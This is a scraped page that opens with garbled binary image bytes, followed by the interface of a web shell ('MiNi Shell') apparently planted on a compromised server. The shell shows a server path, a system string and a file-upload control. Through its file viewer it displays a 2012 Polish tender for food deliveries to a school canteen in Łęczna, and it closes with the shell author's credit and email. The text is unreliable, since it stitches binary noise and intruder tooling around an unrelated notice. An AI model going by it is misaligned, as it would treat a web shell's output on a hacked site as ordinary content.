JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121127/474190-N-2012.html

<p class="kh_header"><b>Łęczna: Dostawa żywności do stołówki szkolnej</b><br>
<b>Numer ogłoszenia: 474190 - 2012; data zamieszczenia: 27.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Nr 2 w Łęcznej z Klasami Integracyjnymi i Oddziałami Sportowymi , ul. Jaśminowa 6, 21-010 Łęczna, woj. lubelskie, tel. 0-81 4627003, faks 0-81 4628415.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> zs2-leczna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności do stołówki szkolnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest dostawa produktów żywnościowych do stołówki szkolnej.  
2. Szczegółowy opis przedmiotu zamówienia zawiera załączniki od 4.1. do 4.9. 
3. Wykonawca zobowiązuje się do zaopatrywania Zamawiającego w artykuły spożywcze w pierwszym gatunku, których termin ważności upływa nie wcześniej niż 5 dni po dacie dostawy oraz z cechami podanymi w SIWZ.
4.Poszczególne zamówienia będą składane telefonicznie  w dni robocze w godzinach między 
700 - 1400
 5. Wykonawca zobowiązuje się dostarczyć towar do siedziby Zamawiającego własnym transportem, na własny koszt i własne ryzyko oraz do elastycznego reagowania na zwiększone lub zmniejszone potrzeby Zamawiającego w stosunku do danego asortymentu lub całości dostawy.
6. W przypadku stwierdzenia przez Zamawiającego wadliwej partii dostarczonego towaru, reklamacja zostanie zgłoszona telefonicznie. Wykonawca zobowiązuje się do jego wymiany na towar wolny od wad w ciągu 3 godzin, w ilościach zakwestionowanych przez Zamawiającego.
7. Nie wykonanie pełnego zakresu ilościowego umowy nie rodzi roszczenia o zakup nie zrealizowanej w okresie obowiązywania umowy ilości towaru.
8. Dopuszcza się zmiany cen produktów stanowiących przedmiot zamówienia w oparciu o wskaźnik cen towarów i usług konsumpcyjnych publikowany, co miesiąc przez GUS.
9.Każdy samochód, którym będzie dostarczana żywność musi posiadać decyzję Państwowego Powiatowego Inspektoratu Sanitarnego stwierdzającą spełnienie warunków do higienicznego przewozu określonych produktów (art. Spożywcze, warzywa, owoce, jaja, mięso i wędliny itp.) 
10.Zamawiający zastrzega sobie prawo do zażądania stosownego dokumentu w momencie dostawy produktów. 
11.Mięso i wędliny muszą być dostarczane w czystych, zamkniętych pojemnikach do przewozu mięsa i wędlin. Mięso surowe nie może być przewożone razem z wędlinami
12.Mrożonki mają być dostarczane w formie nie rozmrożonej,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9, 15.11.30.00-3, 15.13.11.20-2, 15.00.00.00-8, 01.12.13.00-1, 15.33.10.00-7, 15.50.00.00-3, 15.20.00.00-0, 15.11.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1.	Spełniają warunki określone przepisami art. 22 ust1.tj. spełniają warunki, dotyczące:

a)	Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania.
b)	Posiadania wiedzy i doświadczenia.
c)	Dysponowania odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.
d)	Sytuacji ekonomicznej i finansowej
2.	Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 P.z.p.
3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają Lidera do reprezentowania w postępowaniu, załączając do oferty stosowne pełnomocnictwo.
4.	Oświadczenia i dokumenty będą oceniane pod względem formalno-prawnym, pod względem ich aktualności i treści, a także czy informacje w nich zawarte potwierdzają spełnienie wymagań Zamawiającego. Sposób dokonywania oceny spełnienia warunków wymaganych od wykonawców będzie oparty na zasadzie: spełnia/nie spełnia.
5.	Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
6.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki o których mowa w pkt.2, niniejszego rozdziału musi spełniać każdy z wykonawców. Warunki o których mowa w pkt.1 niniejszego rozdziału wykonawcy mogą spełniać łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> zs2-leczna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół nr 2, ul. Jaśminowa 6, 21-010 Łęczna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2012 godzina 11:00, miejsce: sekretariat Zespołu Szkół nr 2, ul. Jaśminowa 6, 21-010 Łęczna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet rybny mrożony- RYBA MORSKA (miruna, błękitek, mintaj, dorsz)gat. I	kg	400
Paluszki rybne z fileta gat. I BEZ FOSFORANÓW	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Śmietana 18 % op. Min 400 ml gat. I 	Szt.	100
Śmietana 22% op. Min 1l gat. I	Szt.	600
Śmietana 22% do ubijania op. Min 1l gat. I	Szt.	300
Śmietana 12 % op. Min 1l gat. I	Szt.	250
Twaróg półtłusty op. Min 250g. gat. I	Kg	500
Ser żółty gat. I	Kg	120
Mleko 2%-3% op. Folia min 1l	Szt.	250
Masło op. Min 200 g. gat I	kg	220.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mieszanka kompotowa op. min 2 kg gat. I	kg	1100
Wiśnie b/pestki op. min 2 kg gat. I	kg	80
Truskawki op. Min 2 kg gat. I	kg	150
Mieszanka chińska op. Min 2 kg gat. I	kg	50
Kalafior op. Min 2 kg gat. I	kg	100
Brokuł op. Min 2 kg gat. I	kg	50
Fasolka szparagowa op. Min 2 kg gat. I	kg	50
Groszek zielony op. min. 2 kg gat. I	kg	30
Zupa jarzynowa op. Min. 2 kg gat. I	kg	80
Marchewka z groszkiem op. Min 2 kg gat. I	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.10.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Produkty owocowo- warzywne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki gat. I	kg	18000
Marchewka gat. I	kg	2000
Pietruszka gat. I	kg	350
Seler gat. I	kg	200
Buraki czerwone gat. I	kg	850
Por gat. I	kg	450
Kapusta biała gat. I	kg	850
Kapusta czerwona gat. I	kg	250
Kapusta pekińska gat. I	kg	250
Kapusta włoska gat. I	kg	350
Kapusta młoda gat. I	Szt.	200
Koperek gat. I	Szt.	200
Natka pietruszki gat. I	Szt.	600
Ogórek świeży gat. I	kg	350
Pomidory gat. I	kg	150
Sałata gat. I	Szt.	450
Papryka gat. I	kg	30
Cebula gat. I	kg	550
Czosnek gat. I	Szt.	100
Kalafior gat. I	Szt.	50
Brokuł gat. I	Szt.	50
Fasolka szparagowa gat. I	kg	100
Szczypiorek gat. I	Szt.	150
Rzodkiewka gat. I	Szt.	150
Szczaw gat. I	kg	6
Wiśnie gat. I	kg	50
Porzeczka czerwona gat. I	kg	50
Śliwki gat. I	kg	200
Truskawki gat. I	kg	100
Jabłka gat. I	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.12.13.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb zwykły, krojony 600g.	kg	2000
Bułka tarta op. papierowe min. 500g. 	kg	250
Pączki 100 g.	Szt.	380.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Drób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mięso drobiowe gulaszowe gat. I	kg	200
Ćwiartka z kurczaka gat. I	kg	550
Kurczaki gat. I	kg	350
Filet z kurczaka gat. I	kg	450
Filet z indyka gat. I	kg	50
Mięso drobiowe typu gyros bez przypraw gat. I	kg	200
Porcja rosołowa ze skrzydełkiem 	kg	650.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Mięso i produkty mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mięso gulaszowe wieprzowe gat. I	kg	1500
Schab b/ kości gat. I	kg	250
Karkówka b/ kości gat. I	kg	100
Szynka wieprzowa surowa b/kości gat. I	kg	50
Łopatka wieprzowa b/kości gat. I	kg	150
Kości pokrzepowe gat. I	kg	300
Boczek surowy łuskany gat. I	kg	150
Flaki suche podgotowane krojone gat. I	kg	150
Kiełbasa zwyczajna gat. I	kg	220
Boczek wędzony łuskany gat. I	kg	200
Smalec op. min. 200 g gat. I	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3, 15.13.11.20-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Produkty ogólnospożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cukier biały, sypki, op. papier. 1 kg gat. I	Kg	1300
Cukier  puder op. min. 400g. gat. I	Kg	40
Cukier wanilinowy op.papier. min.30 g. gat. I	Szt.	150
Mąka pszenna op. papier. 1 kg gat. I	Kg	1000
Mąka ziemniaczana op. papier.1 kg gat. I	Kg	130
Kasza jęczmienna op.min 400g. gat.  I	Kg	60
Kasza jęczmienna saszetka 100g. gat. I	Kg	250
Kasza gryczana saszetka op. 400g. gat. I	Kg	100
Ryż biały op. papier. 1 kg gat. I	Kg	80
Ryż biały saszetka 100g. gat. I	Kg	250
Makaron (kolanka, rurki, świderki, nitki, łazanka, spaghetti)op. min.0,5 kg gat. I
Skład:100%mąka z pszenicy durum	Kg 1000
Sól jodowana op. folia 1 kg gat. I	Kg	400
Barszcz biały w postaci proszku bez konserwantów, op min. 1 kg gat. I	Kg	15
Barszcz czerwony w postaci proszku bez konserwantów, op min. 1 kg gat. I	Kg	15
Fasola sucha gat. I	Kg	150
Groch łuskany gat. I	Kg	50
Pieczarki  świeże gat. I	Kg	200
Kukurydza konserwowa op. puszka min.285g gat. I	 Kg	15
Groszek konserwowy op. puszka min 240g gat.I	Kg	5
Ogórki konserwowe op. słoik min 870g gat. I	Kg	300
Koncentrat pomidorowy 30% op. słoik lub puszka min 800g. gat. I	Kg	90
Chrzan tarty op. słoik min.600 g. gat. I	Kg	30
Seler cięty sałatkowy op. słoik min. 1700ml. Gat. I	Szt.	20
Szczaw konserwowy op. słoik min. 330g. gat. I	Szt.	80
Dżemy niskosłodzone op. słoik lub wiaderko plastik. min. 900 g smaki wiśnia, czarna porzeczka, brzoskwinia gat. I	
Kg	
130
Jabłka prażone op. min.900g słoik lub wiaderko plastik. gat. I 	Kg	250
Olej rzepakowy z pierwszego tłoczenia op. min. 5l butelka plastik. gat. I	Szt.	150
Galaretka owocowa bez sztucznych barwników , różne smaki op. papier. min. 75 g gat. I	Szt.	200
Soda oczyszczana op. papier. Min. 30 g gat. I	Szt.	20
Pieprz czarny mielony op. papier. 20g gat. I	Szt.	300
Pieprz ziołowy op. papier. 20g gat. I	Szt.	300
Majeranek otarty op. papier. 14g gat. I	Szt.	150
Liść laurowy op. papier. 6 g. gat. I	Szt.	300
Ziele angielskie op. papier. 15 g. gat. I	Szt.	300
Sosy sałatkowe różne smaki w postaci proszku op. min. 600 g. gat. I	Kg	10
Przyprawa do potraw w postaci proszku op. min. 250 g gat. I skład: marchew suszona, pietruszka suszona, seler suszony, tłuszcz roślinny, por suszony, suszona natka pietruszki bez konserwantów i sztucznych barwników.	
Kg	90
Przyprawa do kurczaka w postaci proszku op. min. 250 g. gat. I skład: papryka, cebula suszona, czosnek, mąka pszenna, majeranek, pieprz, seler suszony, kolendra, tymianek, kurkuma, natka pietruszki, liść laurowy, imbir bez konserwantów i sztucznych barwników.	Kg	8

Przyprawa do mięs w postaci proszku op. min. 250g. gat. I skład: papryka, mąka pszenna, cebula suszona, aromaty, tłuszcz roślinny, czosnek, natka pietruszki, rozmaryn, pieprz, oregano, tymianek, gałka muszkatołowa, majeranek bez konserwantów i sztucznych barwników.	Kg	8
Przyprawa do bigosu w postaci proszku op. min. 20 g. gat. I bez konserwantów i sztucznych barwników.	
Szt.	
100
Przyprawa do dań chińskich w postaci proszku op. min. 700 g. gat. I typ. fix	Kg	3
Przyprawa do gulaszu w postaci proszku op. min. 1 kg gat. I Skład: papryka mielona, maltodekstryna, sól, tłuszcz roślinny, cebula suszona, 8,5 %, pomidory suszone mielone 4,6 %,cukier, aromaty, sos sojowy, czosnek, kminek, majeranek, liść laurowy bez konserwantów i sztucznych barwników.	Kg	15
Przyprawa do zup w płynie op. min. 1 l skład: woda, sól, ekstrakty drożdżowe ( w tym jęczmień), cukier, aromaty, tłuszcz kurzy, skrobia modyfikowana, regulator kwasowości, kwas cytrynowy.	Szt.	12
Rosół drobiowy w postaci proszku op. min. 500 g. gat. I	Kg	10
Majonez op. słoik lub wiaderko plastik. min.700 g. I	Kg	100
Kwasek cytrynowy op. papier. min. 20 g. gat. I	Szt.	800
Przyprawa do ryb w postaci proszku op. min.600 g. gat. I	Kg	3
Przyprawa do flaków w postaci proszku op. papier. min. 20g. gat. I	Szt.	50
Ocet 10 % op. butelka min. 0,5 l gat. l	Szt.	20
Jaja	Szt.	6000
Sosy w postaci proszku ( bolognese, myśliwski, słodko-kwaśny, grzybowy, pieczeniowy, serowy, węgierski) op. min. 700 g. gat. l bez konserwantów i sztucznych barwników.	Kg 30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Warzywa kiszone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kapusta kiszona 	kg	2000
Ogórki kiszone	kg	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 01.12.13.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com